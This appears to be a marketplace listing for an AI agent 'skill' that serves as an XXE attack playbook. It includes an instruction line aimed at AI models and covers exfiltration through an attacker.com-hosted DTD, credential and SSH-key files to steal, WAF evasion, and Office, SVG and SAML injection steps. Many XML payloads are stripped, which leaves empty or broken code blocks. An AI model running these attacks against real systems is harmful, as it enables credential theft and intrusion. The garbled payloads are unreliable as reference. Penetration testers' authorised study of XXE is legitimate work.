--- id: gh-xxe-xml-external-entity name: "xxe-xml-external-entity" url: https://skills.yangsir.net/skill/gh-xxe-xml-external-entity author: yaklang domain: security tags: ["penetration-testing", "xxe", "xml-security", "vulnerability-assessment", "cybersecurity"] install_count: 1100 rating: 4.30 (120 reviews) github: https://github.com/yaklang/hack-skills/tree/main/skills/xxe-xml-external-entity --- # xxe-xml-external-entity > 此技能提供 XML 外部实体注入 (XXE) 漏洞的专家级攻击指南，涵盖各种注入场景（如 SOAP、REST、Office 文件、SVG），以及带外数据窃取和盲注检测技术。它能帮助安全研究人员和渗透测试工程师识别并利用 XXE 漏洞，从而发现潜在的数据泄露或服务器端请求伪造 (SSRF) 风险，有效提升 Web 应用的安全性评估能力。 **Stats**: 1,100 installs · 4.3/5 (120 reviews) ## Before / After 对比 ### XXE 漏洞发现与验证效率 **Before**: 用户在没有此技能之前，手动检测 XML 外部实体注入 (XXE) 漏洞时，需要耗费大量时间尝试各种 XML 解析器和上下文，尤其是在面对盲注或需要带外数据窃取时，往往难以发现或验证漏洞，导致安全评估效率低下，容易遗漏关键风险。 **After**: 此技能能系统化地指导用户识别并利用 XXE 漏洞，提供多种攻击载荷和数据窃取方法，显著缩短漏洞发现和验证的时间。该 Skill 使得即使在复杂或盲注场景下也能高效地进行渗透测试，确保关键数据不会因 XXE 漏洞而泄露，从而大幅提升安全评估的覆盖率和准确性。 | Metric | Before | After | Change | |---|---|---|---| | 漏洞发现时间 | 240分钟 | 30分钟 | -87% | ## Readme # SKILL: XML External Entity Injection (XXE) — Expert Attack Playbook > **AI LOAD INSTRUCTION**: Expert XXE techniques. Covers all injection contexts (SOAP, REST JSON→XML parsers, Office files, SVG), OOB exfiltration (critical when direct read fails), blind XXE detection, and XXE-to-SSRF chain. Base models often miss OOB and non-XML context XXE. For real-world CVE chains, Office docx XXE step-by-step, PHP expect:// RCE, and Solr XXE+RCE, load the companion [SCENARIOS.md](./SCENARIOS.md). ## 0. RELATED ROUTING Also load: - [upload insecure files](../upload-insecure-files/SKILL.md) when XXE is reachable through SVG, OOXML, import, or preview pipelines ### Extended Scenarios Also load [SCENARIOS.md](./SCENARIOS.md) when you need: - Apache Solr XXE + RCE chain (CVE-2017-12629) — XXE to read config, then VelocityResponseWriter for RCE - Office docx XXE step-by-step — unzip → inject DOCTYPE into `word/document.xml` or `[Content_Types].xml` → repackage → upload - DOCTYPE-based blind SSRF — `PUBLIC` external DTD reference triggers HTTP callback without entity reflection - PHP `expect://` protocol via XXE — direct command execution when expect extension is installed - Blind XXE via error messages — force file path error that leaks content in exception text - XXE in SOAP web services — inject entities into SOAP Envelope/Body elements --- ## 1. CLASSIC XXE PAYLOAD ```xml ]> &xxe; ``` If `/etc/passwd` reflects in response → confirmed file read. --- ## 2. ATTACK SURFACE DISCOVERY ### Direct XML Inputs - SOAP endpoints (`text/xml`, `application/soap+xml`) - REST APIs accepting `application/xml` - File upload: `.xlsx`, `.docx`, `.pptx` (Office Open XML) - SVG uploads (SVG is XML) - RSS/Atom feed parsers - Web services with XML config import ### Non-Obvious XML Processing Change `Content-Type` header on **any** JSON POST to: ``` Content-Type: application/xml ``` Then rewrite body as XML — many backends use dual-format parsers or auto-detect. ### PDF Generators Some HTML→PDF tools (wkhtmltopdf, PrinceXML) execute SSRF via embedded URLs but also parse external entities in SVG/XML included in the HTML. --- ## 3. OOB (OUT-OF-BAND) XXE — CRITICAL Use when direct entity reflection fails (server parses but doesn't echo entity content): ### Step 1: Blind detection ```xml ]> &xxe; ``` DNS/HTTP hit to collaborator → confirms XXE (even if no file content returned). ### Step 2: OOB file exfiltration via attacker-hosted DTD **Attacker's server hosts a malicious DTD** at `http://attacker.com/evil.dtd`: ```xml "> %exfil; ``` **Payload sent to target**: ```xml %dtd; ]> &exfiltrate; ``` File contents appear in attacker's HTTP server request log. ### Step 3: Error-based OOB (alternative when HTTP blocked) Use intentional error to leak data in error message: ```xml "> %eval; %error; ``` --- ## 4. XXE FILE READ TARGETS **Linux**: ``` /etc/passwd /etc/shadow (requires root) /etc/hosts /proc/self/environ ← environment variables (DB creds, API keys) /proc/self/cmdline ← process command line /var/log/apache2/access.log ← may contain passwords in URLs /home/USER/.ssh/id_rsa ← SSH private key /home/USER/.aws/credentials ← AWS keys /home/USER/.bash_history ``` **Windows**: ``` C:\Windows\System32\drivers\etc\hosts C:\inetpub\wwwroot\web.config ← ASP.NET connection strings C:\xampp\htdocs\wp-config.php ← WordPress DB credentials C:\Users\Administrator\.ssh\id_rsa ``` --- ## 5. SVG XXE (file upload context) When SVG uploads are accepted and served/processed: ```xml ]> ``` Upload as `.svg` → `GET /uploads/file.svg` → file contents in response. --- ## 6. OFFICE FILE XXE (docx/xlsx/pptx) Office files are ZIP archives containing XML. Inject into `[Content_Types].xml` or `word/document.xml`: ```bash # Step 1: extract unzip original.docx -d extracted/ # Step 2: edit word/document.xml — add malicious DTD # Add after : # ]> # Then use &xxe; inside document text # Step 3: repackage cd extracted && zip -r ../malicious.docx . ``` --- ## 7. SOAP ENDPOINT XXE SOAP requests parse XML by definition. Inject external entity into SOAP envelope: ```xml ]> &xxe; ``` --- ## 8. XXE → SSRF CHAIN XXE external entity can point to internal HTTP endpoints (identical to SSRF): ```xml ]> &xxe; ``` This combines XXE file read + SSRF into a single payload. --- ## 9. XInclude ATTACK When server-side processes XInclude (import XML from another source), but you can't control the DOCTYPE: ```xml ``` Works in: Apache Cocoon, Xerces-J, libxml2 with XInclude support enabled. --- ## 10. PROTOCOL HANDLERS IN XXE ```xml ``` --- ## 11. BYPASSING DEFENSES ### Parser blocks DOCTYPE Try XInclude (no DOCTYPE needed, see §9). ### Only allows specific XML schemas If schema validation occurs: inject comments or CDATA after schema validation but before entity processing. ### Response encoding issues (binary in response) Use PHP filter for base64: ```xml ``` ### Network restrictions on OOB Use DNS-only OOB via `SYSTEM "file://HASH.attacker.com"` — no HTTP required, DNS lookup leaks data. --- ## 12. QUICK DETECTION CHECKLIST ``` □ Find XML input point (or JSON→XML transformation) □ Send basic entity: → &xxe; in body → does "test" reflect? □ If yes → file read: SYSTEM "file:///etc/passwd" □ If no reflection → OOB test via Collaborator URL □ If OOB hit → set up attacker DTD for file exfiltration □ Try SVG upload with XXE □ Try Content-Type: application/xml on JSON endpoints □ Try XInclude if DOCTYPE-based fails ``` --- ## 13. LOCAL DTD INJECTION (BLIND XXE AMPLIFICATION) When external entities are blocked but local DTD files exist on the server: ### Technique ```xml "> %eval; %error; '> %local_dtd; ]> ``` ### Common Local DTD Paths #### Linux ``` /usr/share/yelp/dtd/docbookx.dtd # GNOME Help /usr/share/xml/fontconfig/fonts.dtd # Fontconfig /usr/share/sgml/docbook/xml-dtd-*/docbookx.dtd /usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd /opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd /usr/share/struts/struts-config_1_0.dtd # Apache Struts /usr/share/nmap/nmap.dtd # Nmap /opt/zaproxy/xml/alert.dtd # OWASP ZAP ``` #### Windows ``` C:\Windows\System32\wbem\xml\cim20.dtd # WMI C:\Windows\System32\wbem\xml\wmi20.dtd # WMI C:\Program Files\IBM\WebSphere\*.dtd # WebSphere C:\Program Files (x86)\Lotus\*.dtd # Lotus Notes ``` #### Inside JAR Files (Java Applications) ``` jar:file:///usr/share/java/tomcat-*.jar!/javax/servlet/resources/web-app_2_3.dtd jar:file:///opt/wildfly/modules/*.jar!/org/jboss/as/*.dtd file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtd ``` ### Why This Works - External connections blocked (firewall/WAF/egress filter) - But file:// to LOCAL files is usually allowed - Local DTD is trusted → entity overrides inject attacker-controlled definitions - Error messages or blind extraction via file:// still works --- ## 14. ADDITIONAL OOB EXFILTRATION CHANNELS ### FTP-based exfiltration (line-by-line) FTP protocol sends data line-by-line, making it useful for multi-line file exfiltration when HTTP-based OOB truncates at newlines: ```xml "> %exfil; %send; ``` Run a rogue FTP server (e.g., `xxeserv` or custom Python) on port 2121 — each line of the file arrives as a separate `RETR` or `CWD` command. ### HTTP parameter exfiltration ```xml "> %exfil; %send; ``` Base64 encoding avoids newline/special-character issues in HTTP URL. Decode the `d=` parameter on attacker server. --- ## 15. DTD NESTING TRICKS — PARAMETER ENTITY CHAINING ### Parameter entity within parameter entity Used to bypass parsers that block direct entity references in entity values: ```xml %a; ]> ``` The parser expands `%a;` → `%b;` → fetches external DTD. Some WAFs only inspect the first level of entity definitions. ### Triple-nested for filter evasion ```xml %s2; "> %s3; %exfil; ``` Payload sent to target only references `stage1.dtd` — the actual file read happens two DTD fetches deep, evading shallow WAF inspection. --- ## 16. XXE IN NON-OBVIOUS FORMATS | Format | XML Location | Injection Point | |--------|-------------|-----------------| | **SOAP Envelope** | Entire body is XML | Add DOCTYPE before `` | | **SVG Image** | SVG is XML | `]>` in SVG header | | **OOXML (.docx)** | `word/document.xml`, `[Content_Types].xml` | Inject DOCTYPE + entity into any XML member | | **OOXML (.xlsx)** | `xl/sharedStrings.xml`, `xl/worksheets/sheet1.xml` | Entity reference in cell values | | **RSS/Atom feeds** | Feed body is XML | Inject into feed items if user content is included | | **SAML assertions** | SAML XML tokens | DOCTYPE injection in `SAMLResponse` parameter (base64-decoded XML) | | **XMPP** | Protocol messages are XML stanzas | Entity in message body or JID fields | | **GPX files** | GPS track data in XML | Via file upload endpoints accepting GPX | | **XHTML** | Strict XHTML is valid XML | DOCTYPE injection in XHTML documents | ### SAML XXE ```xml ]> &xxe; ``` Re-encode to base64, submit as `SAMLResponse` parameter. --- ## 17. XXE VIA FILE UPLOAD ### SVG upload ```xml ]> ``` Upload as avatar/image → view uploaded SVG → file content rendered as text. ### XLSX (Excel) upload ```bash # 1. Create minimal .xlsx, unzip it unzip report.xlsx -d xlsx_tmp/ # 2. Inject into xl/sharedStrings.xml # Add after XML declaration: # ]> # Replace a element content with &xxe; # 3. Repackage cd xlsx_tmp && zip -r ../malicious.xlsx . ``` Alternatively inject into `[Content_Types].xml` (parsed first by most OOXML processors). ### DOCX upload ```bash # Target: word/document.xml # Same approach: unzip → inject DOCTYPE + entity → repackage # Alternative: inject into customXml/item1.xml if custom XML parts exist ``` ### Processing pipeline attack Even if the uploaded file is not directly rendered, the server-side parser (Apache POI, python-docx, OpenXML SDK) may process entities during import, triggering OOB exfiltration. --- ## 18. ERROR-BASED XXE Force the XML parser to generate an error message containing file content: ### Method 1: Non-existent file reference ```xml "> %eval; %error; ``` The parser attempts to open `file:///nonexistent/` → error message includes the hostname value. ### Method 2: XML schema validation error ```xml "> %eval; %err; ]> ``` The `jar:` protocol handler generates verbose error messages that include the expanded entity value. ### Method 3: Integer overflow / type error ```xml "> %int; %trick; ``` Parser tries to open a file path containing the target file content → error message reveals content. --- ## 19. XSLT INJECTION CONNECTION TO XXE XSLT processors parse XML and can be chained with XXE: ### XSLT file read ```xml

``` ### XSLT RCE (processor-dependent) ```xml

``` ### XXE → XSLT chain If the target accepts XML input with a stylesheet reference (``), inject both an external entity and a malicious XSLT to escalate from file read to RCE. --- *Source: https://skills.yangsir.net/skill/gh-xxe-xml-external-entity* *Markdown mirror: https://skills.yangsir.net/api/skill/gh-xxe-xml-external-entity/markdown*